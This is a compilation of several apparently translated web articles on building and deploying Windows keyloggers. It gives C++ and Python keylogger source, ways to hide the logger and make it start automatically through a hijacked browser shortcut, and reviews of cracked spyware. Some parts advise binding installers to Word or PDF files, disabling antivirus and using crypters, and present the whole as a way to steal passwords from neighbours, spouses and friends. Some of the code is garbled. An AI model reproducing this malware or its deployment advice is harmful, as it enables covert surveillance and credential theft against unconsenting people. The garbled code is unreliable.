Keylogger, or what did he type on the keyboard? Information Security Laboratory How to write keylogger viruses

Published January 18, 2015. Where?" There is no need to look for easy ways, especially on the Internet :). Download keylogger for free you can, but be prepared for various restrictions or surprises. Firstly, the functionality of the keylogger will be low. Free demo versions of full-fledged programs usually contain limitations, sometimes unexpected ones :). Secondly, there will be no additional programs or functions for log processing, tracking settings, etc. that usually accompany keyloggers. Thirdly, you will not find keylogger support from manufacturers. Instead of looking where download keylogger for free, think about writing it yourself? simplest keylogger for Windows It’s not very difficult to write if you have the basics of Windows programming. So, we continue to publish the keylogger sources. Keylogger for Windows written in C++, naturally using the Win API. The key hook is implemented using SetWindowsHookEx(WH_KEYBOARD_LL,...). An executable file is created without a dll library, so to speak, a keylogger in one file! The advantages are obvious - it is easier to organize a remote installation, smaller size, greater secrecy (the DLL will not hang in the processes of all applications). The disadvantage of this interception method is that it is unstable, or generally refuses to work in Windows 7. Intercepting keys without using a dll (WH_KEYBOARD_LL) causes misunderstanding among the seven. You have to use shamanism and magic to make the keylogger work. Of course, there is always a way out (look for it yourself, and may the force be with you :)). You can also write a normal one using SetWindowsHookEx (WH_KEYBOARD_LL ,...). Everything will be fine in Windows 7. How WH_KEYBOARD_LL will work in Windows 8 is not yet known.

Logging is organized through a file stream. Added some things to improve log readability. The code is small and efficient. Suitable for a keylogger for windows with certain additives and the question is where can I download keylogger for free disappears.

Source file *.exe:

#include< windows.h >#include< fstream >#include< iostream >#include< algorithm >#include< string >using namespace std; string myKey; BOOL isCaps(); char logName = "keys.txt";//LOG FILE name //init all variables for speed MSG message; HHOOK keyboardHook; char keyNameBuff; PKBDLLHOOKSTRUCT p; unsigned int sc; //keylogger for Windows void writeToLog(string s) //write a string to the log ( ofstream log(logName, ios::app); //opens log file log<< s; //writes to log.. with format "[""]" log.close(); //closes log } // Кейлоггер для Windows BOOL isCaps() { if ((GetKeyState(VK_CAPITAL) & 0x0001)!=0 || ((GetKeyState(VK_SHIFT) & 0x8000)!=0)) { return 1; } else { return 0; } } // Кейлоггер для Windows LRESULT CALLBACK hookProc(int nCode, WPARAM wParam, LPARAM lParam)//proc to be run on hooked key { if (wParam == WM_KEYDOWN)//if key event type is key down { //get the keyname from lParam p = (PKBDLLHOOKSTRUCT) (lParam);//used to get the vkCode sc = MapVirtualKey(p->vkCode, 0);<<= 16; //shift 16 bits if (!(p->sc<= 32))//if not ascii { sc |= 0x1 << 24; // <- extended bit } GetKeyNameTextA(sc,keyNameBuff,16); // Кейлоггер для Windows - исходник //gets ASCII key name from sc into keyNameBuff //write keyname to log myKey = keyNameBuff; if (myKey == "Space") { writeToLog(" "); } else if (myKey == "Right Alt") { writeToLog(""); } else if (myKey == "Enter") { writeToLog(""); } else if (myKey == "Left Alt") { writeToLog(""); } else if (myKey == "Tab") { writeToLog(""); } else if (myKey == "Backspace") { writeToLog(""); } else if (myKey == "Caps Lock") { writeToLog(""); } else if (myKey == "Delete") { writeToLog(""); } else if (myKey == "Right Shift") { writeToLog(""); } else if (myKey == "Shift") { writeToLog(""); } else if (myKey == "Ctrl") { writeToLog(""); } else if (myKey == "Right Ctrl") { writeToLog(""); } // if its none of the special keys else { if (isCaps() == 1) { writeToLog(myKey); } else { std::transform(myKey.begin(), myKey.end(), myKey.begin(), ::tolower); writeToLog(myKey); } } } return CallNextHookEx(NULL, nCode, wParam, lParam); } // Кейлоггер для Windows void msgLoop() { while (GetMessage(&message,NULL,0,0)) { TranslateMessage(&message); DispatchMessage(&message); } } // Кейлоггер для Windows int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, hInstance, 0); //hooks keyboard msgLoop(); //stops from closing // Кейлоггер для Windows - исходник UnhookWindowsHookEx(keyboardHook); //unhooks return 0; //Never run }

vkCodekeylogger for WindowsYou can use any development environment you like (Dev-C++, MSVS, Borland C++). We collect, make the necessary individual changes andready and spend time searching for where you can

download

Hi all!

I had the idea of writing a keylogger a long time ago; at the beginning I wrote it in assembler, but didn’t finish it, it turned out that it was very buggy, but because... There was a lot of work, but I’m not involved in commerce, the incentive quickly disappeared...

Time passed, I somehow forgot about this topic until I came across an article about attacks on the banking system using a simple keylogger and a completely legal program, probably for sending logs and bypassing firewalls...

I was wondering how difficult it is for an “average programmer,” of whom I consider myself, to write a simple keylogger, how it will be processed by the users, and how much time it will take!

The idea of creating such a topic/section appeared only later, when I had almost finished this keylogger.

But first things first, here are the answers to the questions of my mini-research:

1. At the time of writing, the keylogger detects some kind of Endgame, and if you play with Release/Debug and compilation settings, the detections disappear;

2. The keylogger works perfectly with UAC, practically does not burn itself, i.e. you will never understand that your keys are being written to the log.

3. Antiviruses do not react in any way, i.e. They think that’s how it should be.

4. How long did it take? About 5 o'clock

but this needs to be taken into account that I have no experience working in a studio, I had to deal with character encoding, hooks, etc. Of course there was more hassle with coding...

So let's move on to the main part of this article:

1. Statement of the problem:

Write a local keylogger that can track keystrokes and record them in the log; you also need to indicate in the log the date of the press and the application window where the key was pressed; the keylogger must work with Russian and English layouts. Also, the keylogger must work with limited rights in the system and not give itself away in any way, example log:
Unnamed - Notepad: English: M: Fri May 12 20:38:39 2017

Unnamed - Notepad: Russian: : : Fri May 12 20:38:48 2017
Unnamed - Notepad: Russian: : Р: Fri May 12 20:38:48 2017
Unnamed - Notepad: Russian: : И: Fri May 12 20:38:48 2017
Unnamed - Notepad: Russian: : e: Fri May 12 20:38:50 2017

2.The main idea of writing such programs:

It doesn’t matter what you want to write on, the main idea is to put a hook, in simple terms, it’s a “trap” for the keyboard, the point is that when the user presses a key, your program will execute your function (subroutine), where you You can already determine the key pressed, write it to the log, etc.

Windows has it SetWindowsHookEx, which installs a program-defined filter procedure (hook) into a filter chain (hook). You must set up a filter procedure (hook) in order to control certain types of events in the system. These events are associated either with a specific thread or with all threads on the same desktop as the calling thread.

Pay attention to the last sentence, thanks to this property, we can track all keystrokes in other applications.

How to do this, example:

Int main(int argc, _TCHAR* argv) ( keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, hInstance, 0); msgLoop(); return 0; )

HookProc - This is our subroutine (Which will be called after the user presses a key) that we will write later.

MsgLoop() - Also a very important thing, there is a loop, if in simple terms the program is looping and will constantly call hookProc when the user presses a key, here is its code:

Void msgLoop() ( while (GetMessage(&message, NULL, 0, 0)) ( TranslateMessage(&message); DispatchMessage(&message); ) )

Function GetMessage retrieves a message from the calling thread's message queue and places it in the specified structure. This function throttles the arrival of sent messages as long as the queued message is available for retrieval.

Function TranslateMessage translates virtual key messages into character messages.

Function DispatchMessage distributes a message to a window procedure. It is used to deliver the message retrieved by the function GetMessage.

Now let's start writing our main function (subroutine), which will be called after the user clicks on the button:

Spoiler: hookProc (C++ code)

LRESULT CALLBACK hookProc(int nCode, WPARAM wParam, LPARAM lParam) ( if (wParam == WM_KEYDOWN) ( HKL Lang_Keyboard; GetActiveKb (Lang_Keyboard); //Get the current layout. int CodeKeyboard = (int) Lang_Keyboard; p = (PKBDLLHOOKSTRUCT)( lParam); sc = MapVirtualKey(p->vkCode, 0);<<= 16; if (!(p->sc<= 32)) { sc |= 0x1 << 24; } GetKeyNameTextA(sc, keyNameBuff, 16); myKey = keyNameBuff; if (myKey == "Space") { writeToLog(""); } else if (myKey == "Right Alt") { writeToLog(""); } else if (myKey == "Enter") { writeToLog(""); } else if (myKey == "Left Alt") { writeToLog(""); } else if (myKey == "Tab") { writeToLog(""); } else if (myKey == "Backspace") { writeToLog(""); } else if (myKey == "Caps Lock") { writeToLog(""); } else if (myKey == "Delete") { writeToLog(""); } else if (myKey == "Right Shift") { writeToLog(""); } else if (myKey == "Shift") { writeToLog(""); } else if (myKey == "Ctrl") { writeToLog(""); } else if (myKey == "Right Ctrl") { writeToLog(""); } else { if (CodeKeyboard == 0x4190419) { //Русская раскладка //************************************************************************************************* if (isCaps() == 1) { myKey = GetSymbolRu (myKey); writeToLog(myKey); } else { std::transform(myKey.begin(), myKey.end(), myKey.begin(), ::tolower); myKey = GetSymbolRu (myKey); writeToLog(myKey); } //************************************************************************************************* } else { if (isCaps() == 1) { writeToLog(myKey); } else { std::transform(myKey.begin(), myKey.end(), myKey.begin(), ::tolower); writeToLog(myKey); } } } } return CallNextHookEx(NULL, nCode, wParam, lParam); }

I’ll tell you the idea, you can see the program itself in the attachment:

1. Let's start with the prototype of our subroutine:

LRESULT CALLBACK hookProc(int nCode, WPARAM wParam, LPARAM lParam)

WParam - Determines whether a key is pressed, so before we do anything, we check whether the key is pressed like this:

2.1. Get the keyboard layout;
2.2. Receive a virtual keyboard code, from which we can already determine what exactly the user pressed;
2.3. Well, in general, get our symbol.

This code does all of the above:

HKL Lang_Keyboard;<<= 16; if (!(p->sc<= 32)) { sc |= 0x1 << 24; } GetKeyNameTextA(sc, keyNameBuff, 16);

GetActiveKb(Lang_Keyboard); //Get the current layout.

int CodeKeyboard = (int) Lang_Keyboard;

p = (PKBDLLHOOKSTRUCT)(lParam);

sc = MapVirtualKey(p->vkCode, 0);

GetKeyNameTextA - Places the name of the key into the keyNameBuff buffer.<< title; log << ": English"; log << ": " << s; log << ": " << asctime(timeinfo) << endl;

The name of the program the user is working with can be obtained like this:

GetWindowTextA(hwnd, title, 100); GetWindowTextA(hwnd, ntitle, 100); ///pars

The time is like this:

// Gettime time_t seconds = time(NULL); tm* timeinfo = localtime(&seconds);

Ofstream log(logName, ios::app); log<>logName - The path where the log file will be written, I use standard output to the ofstream stream, it can be written, for example, in AppData (Write there), get the path something like this:

Strcpy(logName, getenv("APPDATA")); // Get APPDATA folder strcat(logName, "log.log");

String GetSymbolRu (string Key) ( int Number = 0; string Rezult; Number = _eng.find(Key); if (Number != -1) ( char * tmp = new char ; // initialize the additional array CharToOemA(_rus88, tmp ); // transform delete tmp; // delete the additional array Rezult = Rezult + _rus88; // Assigned the result ) else ( return Key; ) )

So, we find the number in _eng (Number = _eng.find(Key);), then using this number we can already get the symbol in Cyrillic... :)

BUT A COUPLE OF POINTS:

C, in principle, is not friendly with the Cyrillic alphabet, and Visual Studio especially, so to make everything clear, here’s one more tip from me:

Char * tmp = new char ; // initialize the additional array CharToOemA(_rus88, tmp); // convert delete tmp; // remove the additional array

We convert the string with the Cyrillic alphabet, for this we allocate a buffer in memory and use CharToOemA(_rus88, tmp);, now our string will be normally written to a file and output to the console, do not forget to delete delete tmp from memory; Then...:)

If (CodeKeyboard == 0x4190419) ( //Russia log<< title; log << ": Russian"; log << ": " << ReplaceResult(s); log << ":^^^ " << s; log << ": " << asctime(timeinfo) << endl; } else if (CodeKeyboard == 0x4090409) { //Eng log << title; log << ": English"; log << ": " << s; log << ": " << asctime(timeinfo) << endl; }

Well, of course, it will still be necessary to determine the additional ones. keys such as space, enter, etc., something like this:

If (myKey == "Space") ( writeToLog(""); ) else if (myKey == "Right Alt") ( writeToLog(""); ) else if (myKey == "Enter") ( writeToLog(" "); ) else if (myKey == "Left Alt") ( writeToLog(""); ) else if (myKey == "Tab") ( writeToLog(""); ) else if (myKey == "Backspace" ) ( writeToLog(""); ) else if (myKey == "Caps Lock") ( writeToLog(""); ) else if (myKey == "Delete") ( writeToLog(""); ) else if (myKey == "Right Shift") ( writeToLog(""); ) else if (myKey == "Shift") ( writeToLog(""); ) else if (myKey == "Ctrl") ( writeToLog(""); ) else if (myKey == "Right Ctrl") ( writeToLog("");

Everything seems to be basic, the source is in the attachment, it should be clear I think... :)

Oh yeah, I almost forgot:

1. Run on any computer in Visual Studio 2010 (It will increase the size of the binary, but it’s better to do it):

(Project) -> (Properties) -> (Configuration Properties) -> (C/C++) -> (Code Generation) -> (Temporary Execution Library) -> (Multithreaded / MT) and then “OK”;

(Project) -> (Properties) -> (C/C++) -> (Code Generation) -> (Runtime Library) -> (Multi-threaded(/MT)) -> Ok

2. I used a console project, it’s easier to debug, so also:

How to remove the console:

Click Project => Properties(or Alt+F7).

Then Linker => Advanced and drive into Entery Point following: mainCRTStartup.

Just naked sources (There are two of them), for copy-paste and analysis.

A COUPLE MORE QUESTIONS ABOUT KEYLOGER:

1) Is it necessary to develop it, now there is this:

Support for the Latin/Cyrillic alphabet, but not all characters, if I decide to develop it, I will fix it;

A little garbage is written to the logs (You don’t need to take into account the keys that are marked with the “/” symbol), this can be removed.

You can add screenshot support.

2) In general, let us know if this needs to be developed further, by the way, Relise was uploaded to VT, but this is not scary and on purpose, you can then continue to work on bypassing the detection and how and how long it will take for others to have the detection.

PLEASE UNSUBSCRIBE IF POSSIBLE, IF IT MAKES SENSE TO CONTINUE TO CREATE SIMILAR TOPICS AND DEVELOP SIMILAR PRODUCTS HERE! :)

Hello, Khabrovsk residents.

I decided to write a software keyboard logger in C++ using WinAPI. I can’t say that I was pursuing some kind of espionage goal when I wrote it; rather, I was getting acquainted with WinAPI hooks. Since it turned out not so bad, and there is no article on Habré about software loggers, I decided to write my own.

How is this done?

A keyboard hook was used to catch keypresses.

HHOOK WINAPI SetWindowsHookEx(_In_ int idHook, _In_ HOOKPROC lpfn, _In_ HINSTANCE hMod, _In_ DWORD dwThreadId);

In order to intercept all keyboard keystrokes, it is convenient to specify WH_KEYBOARD or WH_KEYBOARD_LL as the idHook parameter. The only difference is that WH_KEYBOARD_LL also intercepts system key presses (i.e. Alt or any key while Alt is held down), so we will select it.

Lpfn is a pointer to a function that processes intercepted messages (in our case, keystrokes).
hMod is an application instance handle containing a processing function.
dwThreadId is the identifier of the thread whose messages we want to intercept. This parameter must be set to 0 to intercept messages from all threads.

The return value is a handle to our hook, which will need to be freed with the UnhookWindowsHookEx function when exiting.
Looking at MSDN for help, we see a prototype of the function that processes messages from this hook.

LRESULT CALLBACK LowLevelKeyboardProc(_In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam);

nCode must be equal to HC_ACTION, otherwise the message is given to another process.
wParam is one of the following values: WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, or WM_SYSKEYUP.
lParam is a pointer to the KBDLLHOOKSTRUCT structure, in the fields of which we are interested only in 2 parameters: vkCode (virtual code) and scanCode of the pressed key.
This function must return the value of the CallNextHookEx function, otherwise the next hook that processes the event may receive incorrect message parameters.
Every time a key is pressed, our program will intercept this event and process it with our LowLevelKeyboardProc procedure.

In order to retranslate the virtual and scan code of a key into symbolic form, we need the ToAsciiEx function.

Int WINAPI ToAsciiEx(_In_ UINT uVirtKey, _In_ UINT uScanCode, _In_opt_ const BYTE *lpKeyState, _Out_ LPWORD lpChar, _In_ UINT uFlags, _In_opt_ HKL dwhkl);

The first 2 parameters are the virtual and scan codes of the key, respectively.
lpKeyState — keyboard state, checks which keys are pressed/active.
lpChar is a pointer to a double word into which the function will write the symbolic representation of the key.
uFlags is a parameter indicating menu activity.
dwhkl — keyboard layout identifier.
The return value is the number of characters written to the lpChar buffer. We are interested in the case when 1 character is written.
Basically, these are the 3 main functions required for the simplest keyboard logger.

A little about the program

The program is compiled without RTL in Visual Studio 2013. Thus, we get a small size of the executable file and the impossibility of building in the debug version. The data is written to a log file in the same directory where the .exe file is located. For convenience, the logger creates a new file each time it records, records the time of key presses, the name of the window in which the characters were entered, and stops by pressing LSHIFT+RSHIFT. This sniffer is not adapted for a full keyboard; some service keys, such as F13 or NUM_LOCK, can be written as . I think those who are at least a little familiar with C/C++ can easily add them. Moreover, you can completely change the code to suit you.

Who among us hasn’t wanted to feel like a cool hacker at least once and break at least something? :) Even if not, then let’s talk about how great it would be to get a password from your mail/social network. the network of a friend, wife/husband, roommate thought at least once by everyone. :) Yes, and you have to start somewhere, after all! A significant part of attacks (hacking) involves infecting the victim’s computer with so-called keyloggers (spyware).

So, in today’s article we’ll talk about what are free programs for monitoring windows-based computers, where you can download their full versions, how to infect a victim’s computer with them, and what are the features of their use.

But first, a little introduction.

What are keyloggers and why are they needed?

I think you yourself have guessed what it is. As a rule, they are a kind of program that is hidden (although this is not always the case) installed on the victim’s computer, after which it records absolutely all keystrokes on this node. Moreover, in addition to the clicks themselves, the following is usually recorded: the date and time of the click (action) and the program in which these actions were performed (browser, including the website address (hurray, we immediately see what the passwords are for!); local application; system services (including Windows login passwords), etc.).

From here one of the problems is immediately visible: I got access to my neighbor’s computer for a couple of minutes and I want to get her password from VK! I installed the miracle program and returned the computer. How can I look up passwords later? Looking for a way to take the computer from her again? The good news is: usually not. Most keyloggers are capable of not only storing the entire accumulated database of actions locally, but also sending it remotely. There are many options for sending logs:

A fixed e-mail (there may be several) is the most convenient option;
FTP server (who has it);
SMB server (exotic, and not very convenient).
A fixed flash drive (you insert it into the USB port of the victim’s computer, and all logs are copied there automatically in invisible mode!).

Why is all this needed? I think the answer is obvious. In addition to the banal stealing of passwords, some keyloggers can do a number of other nice things:

Logging correspondence in specified social networks. networks or instant messengers (for example, Skype).
Taking screenshots of the screen.
View/capture webcam data (which can be very interesting).

How to use keyloggers?

And this is a difficult question. You need to understand that just finding a convenient, functional, good keylogger is not enough.

So, what is needed for a spy program to work successfully?:

Administrator access to a remote computer.
Moreover, this does not necessarily mean physical access. You can easily access it via RDP (Remote Desktop Service); TeamViewer; AmmyAdmin, etc.
As a rule, the greatest difficulties are associated with this point. However, I recently wrote an article about how to get administrator rights in Windows.
Anonymous e-mail / ftp (by which you will not be identified).
Of course, if you are breaking Aunt Shura for your neighbor, this point can be safely omitted. As is the case if you always have the victim’s computer at hand (ala, find out your brother/sister’s passwords).
Lack of working antiviruses / internal Windows protection systems.
Most public keyloggers (which will be discussed below) are known to the vast majority of antivirus software (although there are logger viruses that are built into the OS kernel or system driver, and antiviruses can no longer detect or destroy them, even if they have detected them). Due to the above, anti-virus software, if any, will have to be mercilessly destroyed. In addition to antiviruses, systems like Windows Defender (these first appeared in Windows 7 and later) also pose a danger to our spyware. They detect suspicious activity in software running on a computer. You can easily find information on how to get rid of them on Google.

These, perhaps, are all the necessary and sufficient conditions for your success in the field of stealing other people’s passwords / correspondence / photos or whatever else you want to encroach on.

What types of spyware are there and where can I download them?

So, let’s begin the review of the main keyloggers that I used in my daily practice with links to free downloads of their full versions (i.e., all versions are the latest at the moment (for which it is possible to find a cure) and with already working and tested cracks).

0. The Rat!

Ratings (out of 10):

Stealth: 10
Convenience/usability: 9
Functionality: 8

It's just a bomb, not a keylogger! In working condition it takes 15-20 KB. Why be surprised: it is written entirely in assembly language (veteran programmers shed tears) and written mostly by enthusiastic hackers, due to which the level of its secrecy is simply amazing: it works at the OS kernel level!

In addition, the package includes FileConnector - a mini-program that allows you to connect this keylogger with absolutely any program. As a result, you get a new exe of almost the same size, and when launched, it works exactly like the program with which you glued it together! But after the first launch, your keylogger will be automatically installed in invisible mode with the parameters for sending logs that you have previously specified. Convenient, isn't it?

An excellent opportunity for social engineering (bring a game file/presentation to a friend on a flash drive, or even just a Word document (I’ll tell you how to create an exe file that launches a specific word/excel file in one of my next articles), launch, everything is fine and wonderful, but the friend is already invisibly infected!). Or you simply send this file to a friend by mail (preferably a link to download it, since modern mail servers prohibit sending exe files). Of course, there is still a risk from antiviruses during installation (but it will not exist after installation).

By the way, with the help of some other techniques you can glue together any hidden installation distribution (these are found in The Rat! and Elite keylogger) not only with exe files (which still raise suspicion among even more or less advanced users), but also with ordinary word / excel and even pdf files! No one will ever think anything about a simple pdf, but that’s not the case! :) How this is done is the topic of a whole separate article. Those who are especially zealous can write me questions through the feedback form. ;)

Overall, The Rat! can be described for a very long time and a lot. This was done much better than me. There is also a download link there.

1. Elite keylogger

Ratings (out of 10):

Stealth: 10
Convenience/usability: 9
Functionality: 8

Perhaps one of the best keyloggers ever created. Its capabilities, in addition to the standard set (interception of all clicks in the context of applications / windows / sites), include interception of instant messenger messages, pictures from a webcam, and also - which is VERY important! - interception of WinLogon service passwords. In other words, it intercepts Windows login passwords (including domain ones!). This became possible thanks to its work at the system driver level and launch even at the OS boot stage. Due to this same feature, this program remains completely invisible to both Kasperosky and all other anti-malware software. Frankly, I have not met a single keylogger capable of this.

However, you shouldn’t delude yourself too much. The installer itself is recognized by antiviruses very easily and to install it you will need administrator rights and disabling all antivirus services. After installation, everything will work perfectly in any case.

In addition, the described feature (working at the OS kernel level) introduces requirements for the OS version on which the keyloggers will work. Version 5-5.3 (links to which are given below) supports everything up to Windows 7, inclusive. Win 8 / 10, as well as Windows server family (2003 / 2008 / 2012) are no longer supported. There is version 6, which functions perfectly, incl. on win 8 and 10, however, it is currently not possible to find a cracked version. It will probably appear in the future. In the meantime, you can download Elite keylogger 5.3 from the link above.

There is no network operation mode, therefore it is not suitable for use by employers (to monitor the computers of their employees) or an entire group of people.

An important point is the ability to create an installation distribution with predefined settings (for example, with a specified email address where logs will need to be sent). At the same time, at the end you get a distribution kit that, when launched, does not display absolutely any warnings or windows, and after installation it can even destroy itself (if you check the appropriate option).

Several screenshots of version 5 (to show how beautiful and convenient everything is):

2. All-in-one keylogger.

Ratings (out of 10):

Stealth: 3
Convenience/usability: 9
Functionality: 8

It is also a very, very convenient thing. The functionality is quite at the level of Elite keylogger. Things are worse with secrecy. Winlogon passwords are no longer intercepted, it is not a driver, and is not built into the kernel. However, it is installed in system and hidden AppData directories, which are not so easily accessible to unauthorized users (not those on whose behalf it is installed). Nevertheless, antiviruses sooner or later successfully do this, which makes this thing not particularly reliable and safe when used, for example, at work to spy on your own superiors. ;) Gluing it to something or encrypting the code to hide it from antiviruses will not work.

Works on any version of Win OS (which is nice and practical).

As for the rest, everything is fine: it logs everything (except Windows login passwords), sends it anywhere (including e-mail, ftp, fixed flash drive). In terms of convenience, everything is also excellent.

3. Spytech SpyAgent.

Ratings (out of 10):

Stealth: 4
Convenience/usability: 8
Functionality: 10

Also a good keylogger, although with dubious secrecy. Supported OS versions are also all possible. The functionality is similar to previous options. There is an interesting self-destruct function after a specified period of time (or upon reaching a predetermined date).

In addition, it is possible to record video from a webcam and sound from a microphone, which can also be very popular and which the previous two representatives do not have.

There is a network mode of operation, which is convenient for monitoring an entire network of computers. By the way, StaffCop has it (it is not included in the review due to its uselessness for one user - an individual). Perhaps this program is ideal for employers to spy on their employees (although the leaders in this field are unconditionally StaffCop and LanAgent - if you are a legal entity, be sure to look in their direction). Or to keep track of your offspring who love to sit and watch “adult sites”. Those. where what is needed is not concealment, but convenience (including a bunch of beautiful log reports, etc.) and functionality for blocking specified sites/programs (SpyAgent also has it).

4. Spyrix Personal monitor.

Ratings (out of 10):

Stealth: 4
Convenience/usability: 6
Functionality: 10

The functionality is at the level of the previous candidate, but the same problems with secrecy. In addition, the functionality includes an interesting thing: copying files from USB drives inserted into the computer, as well as remote viewing of logs through a web account on the Spyrix website (but we are going to download a cracked version, so it will not work for us).

5. Spyrix Personal monitor.

Ratings (out of 10):

Stealth: 3
Convenience/usability: 6
Functionality: 8

I won’t describe it in detail, because... this instance does not have anything that one of the previous spies did not have, however, someone may like this keylogger (at least for its interface).

What do we end up with?

The issue of using a keylogger is more ethical than technical, and it greatly depends on your goals.

If you are an employer who wants to control his employees, feel free to set up StaffCop, collect written permission from all employees for such actions (otherwise you may be seriously charged for such things) and the job is in the bag. Although I personally know more effective ways to increase the performance of my employees.

If you are a novice IT specialist who just wants to experience what it’s like to break someone - and how this thing works in general, then arm yourself with social engineering methods and conduct tests on your friends, using any of the examples given. However, remember: the detection of such activity by victims does not contribute to friendship and longevity. ;) And you definitely shouldn’t test this at your work. Mark my words: I have experience with this. ;)

If your goal is to spy on your friend, husband, neighbor, or maybe you even do it regularly and for money, think carefully about whether it’s worth it. After all, sooner or later they may attract. And it’s not worth it: “rummaging through someone else’s dirty laundry is not a pleasant pleasure.” If you still need to (or maybe you work in the field of investigating computer crimes and such tasks are part of your professional responsibilities), then there are only two options: The Rat! and Elite Keylogger. In the mode of hidden installation distributions, glued with word / excel / pdf. And it’s better, if possible, encrypted with a fresh cryptor. Only in this case can we guarantee safer activities and real success.

But in any case, it is worth remembering that the competent use of keyloggers is only one small link in achieving the goal (including even a simple attack). You don’t always have admin rights, you don’t always have physical access, and not all users will open, read, and even more so download your attachments/links (hello social engineering), the antivirus won’t always be disabled/your keylogger/cryptor won’t always be unknown to them . All these and many untold problems can be solved, but their solution is the topic of a whole series of separate articles.

In short, you have just begun to dive into the complex, dangerous, but incredibly interesting world of information security. :)

Sincerely,Lysyak A.S.

Hello, QUAZAR is here again. Today I will show you how to create a simple keylogger in Python. Of course, this keylogger cannot compete with such giants as, but despite this, it can find its use.

What is a keylogger?

You can read in detail about what a keylogger is and about the types of keyloggers in the article ““. To find additional materials on the topic, use the site search, which is located in the upper right corner. Just enter the word "keylogger" or "keylogger".

Simple keylogger in Python

To create a keylogger we need:

Operating system: Windows or MacOs (any Linux can also be used, but I haven't tried it personally)
Python installed on the target machine, as well as special libraries.

This material is for informational purposes only. The information presented in this article is provided for informational purposes only. Neither the editors of the website www.site nor the author of the publication bear any responsibility for any harm caused by the material in this article.

Creating a Simple Keylogger in Python

First you need to download and install Python.

Simple keylogger in Python

After installing Python, you need to install the "pyHook" and "pywin32" modules. On this site you will find 32 and 64 bit versions for Windows and other OSes. Download "PYhook" and "pyWin32" according to your installed version of Python and Windows (32bit or 64bit).

Keylogger in Python. PYhook module

Keylogger in Python. pyWin32 module

Once downloaded, install and open IDLE (Python GUI) menu from the Start menu.

Simple keylogger in Python

Go to the “File” menu and click on the “New File” item. Then paste the keylogger code:

#Name: QUAZAR
#Website: www.site
import pyHook, pythoncom, sys, logging
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

And save it by calling the file Keylogger.pyw. Just don't save the file in the root directory C: where you need administrator rights to copy and delete files. Create a new folder on your C: drive or some other location where you don't need administrator rights to copy files and save Keylogger.pyw there.

You can select any location as the output report file “file_log = “C:keyloggerlog.txt”, but preferably, of course, some hidden location on your hard drive. In this example, I will save the report file to disk in the root directory C:. After all, I have nothing to hide.

Automatic launch of a keylogger in Python

The keylogger is ready. Now we need to make sure that the keylogger starts hidden from the user and automatically when Windows boots. This can be implemented in different ways. Let's try to do it using a bat file by linking the launch of the keylogger to some program or by registering it in startup.

First, create a bat file. Copy and paste the following code into Notepad:

::Name: QUAZAR
::Website: www.site
@echo off
start "" "C:keyloggerkeylogger.pyw"
start "" "C:Program FilesOperalauncher.exe"

In the first line you need to enter the path to the keylogger.pyw file (in my case “C:keylogger.pyw”). In the second line, you must enter the path to the program that the user usually uses (in my case, the Opera browser).

After editing, save the file with a .bat extension (in my case logger.bat) in some hidden location on your computer (in my case in “C:keylogger.bat”).

Now go to the desktop and select a shortcut for a frequently used program (in my case, this is the Opera browser). Right-click the mouse to call up the context menu and go to the shortcut properties. In the “Object” field, enter the path to the keylogger bat file “C:keyloggerlogger.bat”.

After making changes, the shortcut icon will also change. But this can be easily solved on the properties tab (see screenshot above).